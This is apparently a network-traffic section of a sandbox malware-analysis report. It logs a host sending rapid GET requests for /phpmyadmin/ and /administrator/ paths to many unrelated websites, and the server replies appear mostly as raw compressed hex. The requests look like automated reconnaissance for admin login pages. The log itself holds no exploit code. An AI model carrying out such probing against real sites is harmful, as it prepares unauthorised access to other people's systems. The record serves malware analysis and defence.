32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	56519	162.215.240.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.298245907 CET	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.522923946 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4 4d 74 99 b5 ee 2f 4d b9 f3 cc df 46 7f 1b b5 c9 26 a9 9b f9 df 46 c5 Data Ascii: 1faav-[zrE~!uv>efo9`6h6Ec8w/($Jus5Y]QWdZfm;YM=PAgyqE\|.xZW]VT$y=nV,e2U_^Eet5_]l{-C\MwqCpBiV1S4GqqU{:yR716hYGr!_w;,=mkVuQly;hC[bYdSt-?uv$r=/rYbILdZ/GWkQ_ZWJO@d]uq+wz_2!$u\|.yQ?^}~~A'{/{96#([buE]?u2kq.2MZDD3_w}kt[Fu,v~5InU*r8rk1e}Y\|Z7^d`W.k!quY3wh_u57-We-y;~wY~vMQFoO]sj1~%zITTY5_pUoI?$r=/E#i\^R^H]~UgMu<"iQp#j\|mpMf+u^KMt/MF&F
Feb 21, 2024 00:26:09.522938013 CET	1286	IN	Data Raw: 12 67 6d ff 86 e1 8d fb db 28 34 ff 6d c4 64 42 13 fa b7 91 e1 d7 86 ff 6d 04 ef b9 6b ef 96 64 05 47 9c 44 ed d5 fc e7 cd 43 63 98 86 df af fb 81 f8 f2 71 bd 6e a6 ce 1b 7f 5a 57 10 3a b4 0d f3 c3 f8 fb f4 c0 eb 0a 3e 9e 96 eb dc 03 fe d0 86 87 Data Ascii: gm(4mdBmkdGDCcqnZW:>['K+u"}oEKfE~uWsW9'u5>*N7WYC=;~57!no\+mW\|\eqvtYc^uuuGz?$mz;>~
Feb 21, 2024 00:26:09.522983074 CET	1286	IN	Data Raw: 99 cd 71 b8 71 e7 ad 7b 5f c7 d7 d7 53 b7 ea 7e 87 b2 fb 27 ee f3 77 66 1f 3f fb e4 79 4f 0e 2a 3c 51 6c fa d5 1f 5f fe d9 65 f9 cd f8 09 43 d4 f8 cf 49 56 96 97 d9 f4 c7 fd 19 8e df 1c 16 d2 b7 ef c8 7a fc 66 38 a5 bb 27 15 4c 7b 3f f9 7f fe f3 Data Ascii: qq{_S~'wf?yO*<Ql_eCIVzf8'L{?(z&NGv=wG0>>uf>?%f<uC:3MQ$!~(\|gF?>k"?P6.\<m?~T,eQPN<~(/U<)^!{
Feb 21, 2024 00:26:09.522998095 CET	1286	IN	Data Raw: 0e 99 1d d1 13 32 fc 3f e1 77 af b8 ed ce 9d 5b 61 13 e8 d9 ff 51 f4 9e 6e f9 be 6e fc 36 ab 3d f2 7d bd ef 45 ae d7 9d 77 65 7e bb 3d 16 db 19 5c a9 13 b2 ff c3 8e 4f 76 85 b7 31 d8 fb 10 a6 4d d1 7e 90 1d 3a df 9e 6e 16 ae 71 47 49 d1 c2 5c 37 Data Ascii: 2?w[aQnn6=}Ewe~=\Ov1M~:nqGI\7 Jw}fItf:!$YY7xS-K] C<ob7=?uU7CgJuW'rU7]VwO_W>_^P~u;Vuw sf<>x
Feb 21, 2024 00:26:09.523041964 CET	1286	IN	Data Raw: 9b 82 67 dd 2c 63 13 4f db f6 29 59 34 6e 36 7e ba e8 ba d5 e9 68 b4 71 b3 ae 73 d3 45 05 d5 e7 85 6b 93 69 bd 1c 81 90 6f c4 59 46 ab 72 3d 2f aa 76 74 7b d0 a8 a8 a6 e5 3a 77 78 6f db 9e 06 3a db f6 f3 2b d7 8c 55 62 12 95 b0 a7 c4 3b 37 1b 3f Data Ascii: g,cO)Y4n6~hqsEkioYFr=/vt{:wxo:+Ub;7?)}fu9]o\jB'^W]s5;Kd-p,jNd"~*l/d~J7U6v}]7q0dqmG?#?3n\rqyk_yV?}06\|pK
Feb 21, 2024 00:26:09.523056984 CET	1286	IN	Data Raw: db d5 cb b8 07 c4 5e ff 02 c8 76 55 16 5d 57 54 f3 7f 25 56 3c 75 65 d9 fe 2b 10 f7 7e fd 55 71 1a d7 ae e0 d5 e2 ca c5 08 0f 00 7b d7 8e 46 1f f2 ed e0 ec ff ae eb 39 d2 df 64 73 f2 32 ab b2 b9 6b 42 fa ac 9d 36 c5 aa 7b 7e 34 5b 57 53 df 74 b4 Data Ascii: ^vU]WT%V<ue+~Uq{F9ds2kB6{~4[WSt9O8~n~$u8zt-c\|t]M2gWYCf\|]bk?do<i0k(A$/<5O?Y9~g?$Y{SM]vf:~+z7d
Feb 21, 2024 00:26:09.523075104 CET	796	IN	Data Raw: 49 94 29 7f 27 2c 09 36 42 e2 59 61 c9 94 1a bf a4 31 d4 4e 64 ea 59 86 a5 a0 25 c6 80 bd 54 e1 ae c6 32 eb 63 4e b1 0d b7 89 b2 92 4d b6 79 18 59 a8 94 f9 bc b5 da 7a 47 e3 80 2a cc d7 42 12 ef 6c ca ec c4 e3 2b cb 09 d3 c1 c8 c4 d3 b3 c0 81 9f Data Ascii: I)',6BYa1NdY%T2cNMyYzG*Bl+}P51o0SA6@>ynhVJ~\[)gMP1o)DXYb6xGL%PSk;VP66A9nlq;aX%1^ML\|QE"T>VBx
Feb 21, 2024 00:26:09.523088932 CET	1286	IN	Data Raw: 31 66 61 30 0d 0a ec 0b 5f a6 25 b8 e1 97 29 e2 9f a5 f5 c3 71 ce db 21 38 93 a1 6b e2 b1 65 ca fa 58 32 e4 01 23 a4 8f 79 2a 55 88 61 2c 1f 53 93 ea 89 e7 0e 1f 78 a5 50 66 c3 2e cc e7 41 39 f5 52 40 63 2c 49 04 7c ca 95 df 1d 67 55 21 86 a1 75 Data Ascii: 1fa0_%)q!8keX2#y*Ua,SxPf.A9R@c,I\|gU!us02HcbOr?(q6Dg~Lm.cM]ed-/5br=?I%$]oMqB/2r>?a;I]^7-r
Feb 21, 2024 00:26:09.523130894 CET	1286	IN	Data Raw: 62 a6 e8 f6 31 c6 63 44 f2 ac cb e2 ae e8 4a 37 8e be 6a 8a 2b 6f 96 ff 6e ea 4d b7 88 1e b8 ef 4f 3a 43 de 43 c4 f3 00 31 8a b6 dc cb a2 ed 5e 38 10 7a 7e 9b 84 97 ff 61 34 1e a2 fa ae f8 27 db e7 2e ef e7 93 ba ea 60 0f f2 aa 6b b2 ce cd 6f 7e Data Ascii: b1cDJ7j+onMO:CC1^8z~a4'.`ko~?u^MV^:pvt}Ee+yF(/PuXyI\jWY<+_X$fm*{@OyH_a7yIv?Nn\|t
Feb 21, 2024 00:26:09.523169041 CET	1286	IN	Data Raw: 22 d7 cb b2 6a c7 d1 a2 eb 56 a7 a3 d1 66 b3 49 36 22 a9 9b f9 88 53 4a fd 0e 77 b0 1e 9d ad b2 6e 41 f2 71 f4 52 26 fe 96 90 c6 5e a8 c4 2a 25 e5 0b 5c 9a 1b a9 cd 05 b3 2f 86 f4 eb 97 3c 61 ca 70 4e 64 c2 52 2d 60 2d 45 51 34 84 f8 11 12 31 2c Data Ascii: "jVfI6"SJwnAqR&^*%\/<apNdR-`-EQ41,}Z&:TkcI-;j24qfjhon'zV&0b_UhbXK/B-epg&wU2Id<<KIV61J+x#++i0[C>e/I
Feb 21, 2024 00:26:09.698081017 CET	1286	IN	Data Raw: 05 81 74 5f c7 44 df 07 d7 ec e7 60 2e bc b9 3d 43 00 b6 d4 06 26 29 0a 7a 6a da db ce 42 2c 3d 90 e7 61 19 cf 28 6c 67 95 1c d6 b5 fd fe fe 96 5e 10 e4 f6 0f bd 64 76 b2 7b 08 a2 8a 5e e5 30 23 c8 6e f6 20 e1 2e 2a 9d ec 58 84 cb c1 7f 3b 9e e1 Data Ascii: t_D`.=C&)zjB,=a(lg^dv{^0#n .*X;l?goNUlb:SjClSAI\|,H 5'^w!VI]We;Uv{QMd/Jw(\|XL,4:9jbjjb~o

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	56568	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.300890923 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.487776041 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache set-cookie: __tad=1708471569.6086288; expires=Fri, 17-Feb-2034 23:26:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	56567	162.0.235.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.302284956 CET	185	OUT	GET /administrator/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.471312046 CET	1050	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:09 GMT server: LiteSpeed location: https://norwegischlernen.info/administrator/ x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Feb 21, 2024 00:26:11.102514029 CET	249	OUT	GET /administrator/index.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/administrator/
Feb 21, 2024 00:26:11.268567085 CET	1059	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:11 GMT server: LiteSpeed location: https://norwegischlernen.info/administrator/index.php x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	56583	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.306040049 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.473969936 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache set-cookie: __tad=1708471569.6011695; expires=Fri, 17-Feb-2034 23:26:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	56581	51.159.190.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.306041956 CET	181	OUT	GET /administrator/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
